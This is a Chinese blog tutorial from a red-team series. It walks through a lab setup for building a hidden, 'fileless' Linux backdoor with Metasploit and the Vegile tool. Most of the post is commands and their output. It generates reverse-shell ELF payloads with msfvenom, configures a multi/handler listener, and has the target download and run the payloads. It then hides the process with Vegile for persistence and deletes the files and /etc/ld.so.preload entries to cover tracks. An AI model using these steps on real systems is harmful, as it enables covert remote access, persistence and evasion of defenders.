红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/7082c65f8c854808a3cc834343a8599d.gif)
欢迎各位彦祖与热巴畅游本人专栏与博客
你的三连是我最大的动力
以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]
专栏跑道一
➡️网络空间安全——全栈前沿技术持续深入学习
专栏跑道二
➡️ 24 Network Security -LJS
专栏跑道三
➡️ MYSQL REDIS Advance operation
专栏跑道四
➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]
专栏跑道五
➡️RHCE-LJS[Linux高端骚操作实战篇]
专栏跑道六
➡️数据结构与算法[考研+实际工作应用+C程序设计]
专栏跑道七
➡️RHCSA-LJS[Linux初级及进阶骚技能]
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/6925bcc063c9420da504e5bbd0fe1fe7.gif)
上节回顾
目录
欢迎各位彦祖与热巴畅游本人专栏与博客
你的三连是我最大的动力
以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]
专栏跑道一
➡️网络空间安全——全栈前沿技术持续深入学习
专栏跑道二
➡️ 24 Network Security -LJS
专栏跑道三
➡️ MYSQL REDIS Advance operation
专栏跑道四
➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]
专栏跑道五
➡️RHCE-LJS[Linux高端骚操作实战篇]编辑
专栏跑道六
➡️数据结构与算法[考研+实际工作应用+C程序设计]
专栏跑道七
➡️RHCSA-LJS[Linux初级及进阶骚技能]
上节回顾
1.实战-Linux 无文件木马程序
1.1环境准备
按照之前学习的方法生成一个恶意文件让目标系统执行来获取 shell
再生成一个用来隐藏执行的后门
补充:
1.2启动 apache
上传 Vegile 维吉尔工具到网站目录下方便 centos 下载
注意:
1.3获取 Linux 系统的 shell
MSF 配置监听
先安装下载工具
添加执行权限
使用 sessionID 连接 centos
参数详解:
注意:
扩展:
注意:
1.4创建无文件后门程序
补充:
回到前面建立的 session 中下载用于隐藏进程的工具
解压+cd+x
下载用于隐藏执行的后门程序+x
隐藏执行后门程序
回到另一个 MSF 控制台查看 session
查看一下我们注入到了哪个进程
删除我们下载的所有文件
注意:
举例:
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/4564e43bf982495db922195c39f43d88.gif)
1.实战-Linux 无文件木马程序
1.1环境准备
- Kali:192.168.1.53
- Centos:192.168.1.63
按照之前学习的方法生成一个恶意文件让目标系统执行来获取 shell
┌──(root㉿kali-2024)-[/home/ljs/Desktop]└─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.1.53 LPORT=8080 -b \"\\x00\" -f elf -o /var/www/html/xuegod-backdoorFound 3 compatible encodersAttempting to encode payload with 1 iterations of x64/xorx64/xor succeeded with size 175 (iteration=0)x64/xor chosen with final size 175Payload size: 175 bytesFinal size of elf file: 295 bytesSaved as: /var/www/html/xuegod-backdoor
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/ffaaff7e851945aca4dcdc46b3bbc616.png)
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/60e41eed520745c6a0f619d541c14e4d.gif)
再生成一个用来隐藏执行的后门
补充:
- ghost 是什么意思? 还原系统?
┌──(root㉿kali-2024)-[/home/ljs/Desktop]└─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b \"\\x00\" -f elf -o /var/www/html/xuegod-ghost Found 3 compatible encodersAttempting to encode payload with 1 iterations of x64/xorx64/xor succeeded with size 175 (iteration=0)x64/xor chosen with final size 175Payload size: 175 bytesFinal size of elf file: 295 bytesSaved as: /var/www/html/xuegod-ghost
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/9fa0c277988b46b284e20f2ddb2a9157.png)
1.2启动 apache
┌──(root㉿kali-2024)-[/home/ljs/Desktop]└─# systemctl start apache2 ┌──(root㉿kali-2024)-[/home/ljs/Desktop]└─# systemctl enable apache2 #设置开机启动,Synchronizing state of apache2.service with SysV service script with /usr/lib/systemd/systemd-sysv-install.Executing: /usr/lib/systemd/systemd-sysv-install enable apache2Created symlink \'/etc/systemd/system/multi-user.target.wants/apache2.service\' → \'/usr/lib/systemd/system/apache2.service\'. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]└─# systemctl is-enabled apache2enabled
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/f6410f1d1af94531be734af87dd52594.png)
上传 Vegile 维吉尔工具到网站目录下方便 centos 下载
- Vegile 官方下载链接
- Vegile 常用方法:
- ./Vegile --i 隐藏你的后门
- ./Vegile --u 无限复制你的 metasploit 会话,即使他被 kill,依然可以再次运行
注意:
- 木马一定要放在 Vegile 目录下
- Vegile 一般用于维持 meterpreter 会话
┌──(root㉿kali-2024)-[/home/ljs/Desktop]└─# cd /var/www/html/ ┌──(root㉿kali-2024)-[/var/www/html]└─# rz
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/e18369e53ee14b39985dba37a787ca53.png)
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/3a6b8ea2bc954e08b7fecef472b70204.gif)
1.3获取 Linux 系统的 shell
MSF 配置监听
msf6 exploit(windows/smb/psexec) > backmsf6 > use exploit/multi/handler[*] Using configured payload linux/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcppayload => linux/x64/shell/reverse_tcpmsf6 exploit(multi/handler) > set LHOST 192.168.1.53LHOST => 192.168.1.53msf6 exploit(multi/handler) > set LPORT 8080 #改成8080,防止和上面实验的 4444 端口冲突LPORT => 8080msf6 exploit(multi/handler) > exploit -j #在后台运行 handler,发现现在并没有 session,因为客户端还没有执行
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/de96b7c1904e4707a1e9b3c67c555851.png)
- 到 centos 操作系统下载执行文件来建立 session,为了模拟实战效果隐藏行为通过该 session进行操作
先安装下载工具
┌──(root㉿kali-2024)-[/var/www/html]└─# wget 192.168.1.53/xuegod-backdoor
添加执行权限
┌──(root㉿kali-2024)-[/var/www/html]└─# chmod +x xuegod-backdoor
执行完成后获取到 session
┌──(root㉿kali-2024)-[/var/www/html]└─# ./xuegod-backdoor
使用 sessionID 连接 centos
msf6 exploit(multi/handler) > sessions -i 2
参数详解:
- -i Interact with the supplied session ID
注意:
- 这个 payload 中的 shell 是没有 bash 提示符的
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/8b061756d2394c5aac4a81d53bcda5b2.png)
扩展:
- 如何查看我们当前进程的名字和 PID?
查看网络连接状态:netstat -antup | grep 8080
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/c1440b83fa6c4b77a0ce6590709276f1.png)
- 可以看到我们的 pid 是 2406
ps -aux | grep 2406
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/630c2ddd2be4427abf1877bc276d5cff.png)
- 查看 IP 地址,发现找不到
- 但是可以可以使用绝对路径
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/cb058205253d4b068d48d4b24fae4858.png)
注意:
上图的 session 要保持连接,先不要断开!后期面要使用到
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/4aa0a40075d14d8598117aa1f3537364.gif)
1.4创建无文件后门程序
补充:
新建终端窗口,MSF 控制台可以启动多个互不影响
[-] Parse error: Unmatched quote: \"\' use exploit/multi/handler\"msf6 > use exploit/multi/handler[*] Using configured payload linux/x64/shell/reverse_tcpmsf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcppayload => linux/x64/shell/reverse_tcpmsf6 exploit(multi/handler) > set LHOST 192.168.1.53LHOST => 192.168.1.53msf6 exploit(multi/handler) > set LPORT 4444LPORT => 4444msf6 exploit(multi/handler) > exploit -j
回到前面建立的 session 中下载用于隐藏进程的工具
wget 192.168.1.53/Vegile-master.zip
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/a61e1879064a4f458486ec5d921dbee0.png)
解压+cd+x
unzip Vegile-master.zipcd Vegile-masterchmod +x Vegile
下载用于隐藏执行的后门程序+x
wget 192.168.1.53/xuegod-ghostchmod +x xuegod-ghost
隐藏执行后门程序
- 这里是退出 Vegile,不是退出当前的 session。
回到另一个 MSF 控制台查看 session
- 目标端口为 52038
查看一下我们注入到了哪个进程
msf6 exploit(multi/handler) > sessions -i 3
- 同样是一个 sh 进程
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/108ef15f75c144e7a4da4dde98ca8f50.gif)
删除我们下载的所有文件
rm -rf /root/Vegile-master
- 如遇到错误提示:
ERROR: ld.so: object \'/usr/local/lib/libprocesshider.so\' from/etc/ld.so.preload cannot be preloaded: ignored.- 解决方法:
echo \"\" > /etc/ld.so.preload # 64 位系统没有这个文件导致报错
注意:
- 删除时,也会把 xuegod-ghost 这个后门程序删除了。
- 虽然文件被删除了,但会话,还是建立着了。
- 删除我们所有文件之后程序依旧正常执行。
举例:
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/f48f6c5c8c4c4deeb0ef4860915e0710.gif)
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/ec296943668244dd84cef6d21c966b2f.gif)

![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/67f4df3eb193446c94ac0f41b7f523fa.png)
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/8fd93e63521b4287a8de332b99cf1786.png)
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/53322bd2df734d7c95c3247ff386d0f6.png)
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/cc50fcd78fa54b37b891b8ae82ae71c6.png)
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/f6326216071241c1a7f60242d52be3ee.png)
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/4ac1ac8fd8964145bf1cd6119d04b413.png)
![红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]](https://i-blog.csdnimg.cn/direct/e401edc5c06444d4ba42d1d46835f1f9.png)

